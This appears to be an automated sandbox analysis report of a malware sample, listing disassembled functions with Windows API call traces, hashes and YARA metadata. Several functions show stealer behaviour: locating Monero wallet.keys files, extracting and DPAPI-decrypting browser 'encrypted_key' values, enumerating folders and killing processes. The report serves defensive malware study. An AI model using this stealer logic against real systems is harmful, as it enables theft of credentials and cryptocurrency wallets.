                                • Associated: 00000000.00000002.2156997211.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000F71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000FA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.000000000111E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000012AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.0000000001396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157472097.00000000013D0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157585260.0000000001573000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157600588.0000000001574000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                • String ID:
                                • API String ID: 211194620-0
                                • Opcode ID: 82f293d1953008b198c38096c6b88ded7da894732fa792440eb3c671f8f96f5f
                                • Instruction ID: 933f0ee14168822beb241504e4304776972b6c928c29e60ca4ea4ea69b6cb321
                                • Opcode Fuzzy Hash: 82f293d1953008b198c38096c6b88ded7da894732fa792440eb3c671f8f96f5f
                                • Instruction Fuzzy Hash: E1E16D76C101089ACB09FBA0EC96EEE7378EF54300F54917AF41672191EF706B4ADB66
                                Function 00ECD400 Relevance: 6.3, APIs: 4, Instructions: 252filestringCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00EDA740: lstrcpy.KERNEL32(00EE0E17,00000000), ref: 00EDA788
                                  • Part of subcall function 00EDA9B0: lstrlen.KERNEL32(?,01B88950,?,\Monero\wallet.keys,00EE0E17), ref: 00EDA9C5
                                  • Part of subcall function 00EDA9B0: lstrcpy.KERNEL32(00000000), ref: 00EDAA04
                                  • Part of subcall function 00EDA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00EDAA12
                                  • Part of subcall function 00EDA8A0: lstrcpy.KERNEL32(?,00EE0E17), ref: 00EDA905
                                  • Part of subcall function 00ED8B60: GetSystemTime.KERNEL32(00EE0E1A,01B89EE8,00EE05AE,?,?,00EC13F9,?,0000001A,00EE0E1A,00000000,?,01B88950,?,\Monero\wallet.keys,00EE0E17), ref: 00ED8B86
                                  • Part of subcall function 00EDA920: lstrcpy.KERNEL32(00000000,?), ref: 00EDA972
                                  • Part of subcall function 00EDA920: lstrcat.KERNEL32(00000000), ref: 00EDA982
                                • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00ECD481
                                • lstrlen.KERNEL32(00000000), ref: 00ECD698
                                • lstrlen.KERNEL32(00000000), ref: 00ECD6AC
                                • DeleteFileA.KERNEL32(00000000), ref: 00ECD72B
                                Memory Dump Source
                                • Source File: 00000000.00000002.2157012241.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.2156997211.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000F71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000FA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.000000000111E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000012AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.0000000001396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157472097.00000000013D0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157585260.0000000001573000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157600588.0000000001574000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                • String ID:
                                • API String ID: 211194620-0
                                • Opcode ID: 4795ef4502cd474cf59cca537609af1af35e5961f1ed17535edd7f4372ef2026
                                • Instruction ID: 212d79abbaf25b732d6050a2e06c77ab2a42da3895f5f725dceb634e003adf56
                                • Opcode Fuzzy Hash: 4795ef4502cd474cf59cca537609af1af35e5961f1ed17535edd7f4372ef2026
                                • Instruction Fuzzy Hash: 9D914F768101089ACB08FBA0DD96EEE7378EF54300F44517AF417B2291EF746B4ADB66
                                Function 00ECD780 Relevance: 6.2, APIs: 4, Instructions: 221filestringCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00EDA740: lstrcpy.KERNEL32(00EE0E17,00000000), ref: 00EDA788
                                  • Part of subcall function 00EDA9B0: lstrlen.KERNEL32(?,01B88950,?,\Monero\wallet.keys,00EE0E17), ref: 00EDA9C5
                                  • Part of subcall function 00EDA9B0: lstrcpy.KERNEL32(00000000), ref: 00EDAA04
                                  • Part of subcall function 00EDA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00EDAA12
                                  • Part of subcall function 00EDA8A0: lstrcpy.KERNEL32(?,00EE0E17), ref: 00EDA905
                                  • Part of subcall function 00ED8B60: GetSystemTime.KERNEL32(00EE0E1A,01B89EE8,00EE05AE,?,?,00EC13F9,?,0000001A,00EE0E1A,00000000,?,01B88950,?,\Monero\wallet.keys,00EE0E17), ref: 00ED8B86
                                  • Part of subcall function 00EDA920: lstrcpy.KERNEL32(00000000,?), ref: 00EDA972
                                  • Part of subcall function 00EDA920: lstrcat.KERNEL32(00000000), ref: 00EDA982
                                • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00ECD801
                                • lstrlen.KERNEL32(00000000), ref: 00ECD99F
                                • lstrlen.KERNEL32(00000000), ref: 00ECD9B3
                                • DeleteFileA.KERNEL32(00000000), ref: 00ECDA32
                                Memory Dump Source
                                • Source File: 00000000.00000002.2157012241.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.2156997211.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000F71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000FA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.000000000111E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000012AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.0000000001396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157472097.00000000013D0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157585260.0000000001573000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157600588.0000000001574000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                • String ID:
                                • API String ID: 211194620-0
                                • Opcode ID: 3b81270923d76abf63ab3fbf89ffa8338b909adbcfaad8e6175354b61c24d99c
                                • Instruction ID: 45f8ac930968496ce7a1746254836c21a437def7d9409ba49dd1e5458950e2d8
                                • Opcode Fuzzy Hash: 3b81270923d76abf63ab3fbf89ffa8338b909adbcfaad8e6175354b61c24d99c
                                • Instruction Fuzzy Hash: 408151768101089ACB08FBA0DD96EEE7378EF54300F44513AF417B2291EF746B4ADB62
                                Function 00ED3560 Relevance: 6.1, APIs: 4, Instructions: 124COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.2157012241.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.2156997211.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000F71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000FA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.000000000111E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000012AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.0000000001396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157472097.00000000013D0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157585260.0000000001573000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157600588.0000000001574000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen
                                • String ID:
                                • API String ID: 367037083-0
                                • Opcode ID: 821d57b9c179dbc356e7348f1526250397627eb5cbdb067267a851267485cea7
                                • Instruction ID: 4a334bbb07b62adbf1e1fd284ec2b63f6f7f9ec4dc35db4e25e153d5af99caba
                                • Opcode Fuzzy Hash: 821d57b9c179dbc356e7348f1526250397627eb5cbdb067267a851267485cea7
                                • Instruction Fuzzy Hash: 67413F75D10209AFCB04EFB5D845AEEB7B4EF44304F04902AE41676390DB75AA46CBA2
                                Function 00EC9CE0 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 98COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00EDA740: lstrcpy.KERNEL32(00EE0E17,00000000), ref: 00EDA788
                                  • Part of subcall function 00EC99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00EC99EC
                                  • Part of subcall function 00EC99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00EC9A11
                                  • Part of subcall function 00EC99C0: LocalAlloc.KERNEL32(00000040,?), ref: 00EC9A31
                                  • Part of subcall function 00EC99C0: ReadFile.KERNEL32(000000FF,?,00000000,00EC148F,00000000), ref: 00EC9A5A
                                  • Part of subcall function 00EC99C0: LocalFree.KERNEL32(00EC148F), ref: 00EC9A90
                                  • Part of subcall function 00EC99C0: CloseHandle.KERNEL32(000000FF), ref: 00EC9A9A
                                  • Part of subcall function 00ED8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00ED8E52
                                • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00EC9D39
                                  • Part of subcall function 00EC9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N,00000000,00000000), ref: 00EC9AEF
                                  • Part of subcall function 00EC9AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00EC4EEE,00000000,?), ref: 00EC9B01
                                  • Part of subcall function 00EC9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N,00000000,00000000), ref: 00EC9B2A
                                  • Part of subcall function 00EC9AC0: LocalFree.KERNEL32(?,?,?,?,00EC4EEE,00000000,?), ref: 00EC9B3F
                                  • Part of subcall function 00EC9B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00EC9B84
                                  • Part of subcall function 00EC9B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 00EC9BA3
                                  • Part of subcall function 00EC9B60: LocalFree.KERNEL32(?), ref: 00EC9BD3
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2157012241.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.2156997211.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000F71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000FA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.000000000111E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000012AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.0000000001396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157472097.00000000013D0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157585260.0000000001573000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157600588.0000000001574000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                                • String ID: $"encrypted_key":"$DPAPI
                                • API String ID: 2100535398-738592651
                                • Opcode ID: bb38d519e6650bf2834154114c4c1f53e0bca1a7d8d67b4c8dcbfa9dcc740bff
                                • Instruction ID: e884cc812019180839e2eb0cac5d3ab26b4240ea7f33720f35b619636e9f6499
                                • Opcode Fuzzy Hash: bb38d519e6650bf2834154114c4c1f53e0bca1a7d8d67b4c8dcbfa9dcc740bff
                                • Instruction Fuzzy Hash: 7C3150B6D10209ABCB04DBE4DD89FEEB7B8AF48304F14551DE902B7242E7319A05CBA1
                                Function 00ED94D0 Relevance: 6.1, APIs: 4, Instructions: 89COMMON
                                Download Yara Rule
                                APIs
                                • memset.MSVCRT ref: 00ED94EB
                                  • Part of subcall function 00ED8D50: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,00ED951E,00000000), ref: 00ED8D5B
                                  • Part of subcall function 00ED8D50: RtlAllocateHeap.NTDLL(00000000), ref: 00ED8D62
                                  • Part of subcall function 00ED8D50: wsprintfW.USER32 ref: 00ED8D78
                                • OpenProcess.KERNEL32(00001001,00000000,?), ref: 00ED95AB
                                • TerminateProcess.KERNEL32(00000000,00000000), ref: 00ED95C9
                                • CloseHandle.KERNEL32(00000000), ref: 00ED95D6
                                Memory Dump Source
                                • Source File: 00000000.00000002.2157012241.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.2156997211.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000F71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000FA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.000000000111E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000012AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.0000000001396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157472097.00000000013D0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157585260.0000000001573000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157600588.0000000001574000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Process$Heap$AllocateCloseHandleOpenTerminatememsetwsprintf
                                • String ID:
                                • API String ID: 3729781310-0
                                • Opcode ID: 1a3f0d393cfecd51d7bbcab8bd45c42bc7a2db1136f1ec84bc0718bfc760bcdb
                                • Instruction ID: 42c8a5119befa2acba33d04971cbe5506b74862dfb32400ac42073113103f767
                                • Opcode Fuzzy Hash: 1a3f0d393cfecd51d7bbcab8bd45c42bc7a2db1136f1ec84bc0718bfc760bcdb
                                • Instruction Fuzzy Hash: C8313E71E003089FDB15DBE0DD49BEDB7B8EF44300F10546AE506AB288DBB49A86CB51
                                Function 00EDC742 Relevance: 6.0, APIs: 4, Instructions: 34COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • __getptd.LIBCMT ref: 00EDC74E
                                  • Part of subcall function 00EDBF9F: __amsg_exit.LIBCMT ref: 00EDBFAF
                                • __getptd.LIBCMT ref: 00EDC765
                                • __amsg_exit.LIBCMT ref: 00EDC773
                                • __updatetlocinfoEx_nolock.LIBCMT ref: 00EDC797
                                Memory Dump Source
                                • Source File: 00000000.00000002.2157012241.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.2156997211.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000F71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000FA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.000000000111E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000012AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.0000000001396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157472097.00000000013D0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157585260.0000000001573000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157600588.0000000001574000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                                • String ID:
                                • API String ID: 300741435-0
                                • Opcode ID: 56de016301ca9677f038b97fa7ea0548783fe265edf95e4b9c4e951dd0888db0
                                • Instruction ID: c1378bcf0ee1c27e4fb36f779a32a548cf433f0aace2bcc17b87d3f3312c1b0c
                                • Opcode Fuzzy Hash: 56de016301ca9677f038b97fa7ea0548783fe265edf95e4b9c4e951dd0888db0
                                • Instruction Fuzzy Hash: 9FF0F032A00306DBDB20BBB8884274E33E0EF00764F35214BF014BA3D2EB245943CE46
                                Function 00ED4F40 Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00ED8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00ED8E0B
                                • lstrcat.KERNEL32(?,00000000), ref: 00ED4F7A
                                • lstrcat.KERNEL32(?,00EE1070), ref: 00ED4F97
                                • lstrcat.KERNEL32(?,01B889A0), ref: 00ED4FAB
                                • lstrcat.KERNEL32(?,00EE1074), ref: 00ED4FBD
                                  • Part of subcall function 00ED4910: wsprintfA.USER32 ref: 00ED492C
                                  • Part of subcall function 00ED4910: FindFirstFileA.KERNEL32(?,?), ref: 00ED4943
                                  • Part of subcall function 00ED4910: StrCmpCA.SHLWAPI(?,00EE0FDC), ref: 00ED4971
                                  • Part of subcall function 00ED4910: StrCmpCA.SHLWAPI(?,00EE0FE0), ref: 00ED4987
                                  • Part of subcall function 00ED4910: FindNextFileA.KERNEL32(000000FF,?), ref: 00ED4B7D
                                  • Part of subcall function 00ED4910: FindClose.KERNEL32(000000FF), ref: 00ED4B92
                                Memory Dump Source
                                • Source File: 00000000.00000002.2157012241.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.2156997211.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000F71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000FA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.000000000111E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000012AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.0000000001396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157472097.00000000013D0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157585260.0000000001573000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157600588.0000000001574000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                                • String ID:
                                • API String ID: 2667927680-0
                                • Opcode ID: d24e9aad3adb657adce81a7ee1766aa3689c6754f4a9175497075c857b4ae367
                                • Instruction ID: dcc3ed6400791c93ddd1efa1bad57188a0f5785c03382146193312756c73b575
                                • Opcode Fuzzy Hash: d24e9aad3adb657adce81a7ee1766aa3689c6754f4a9175497075c857b4ae367
                                • Instruction Fuzzy Hash: 6021B8B6D0030867C768F760EC46EED337CAB54300F0055A9B659A3185EEB597C98B91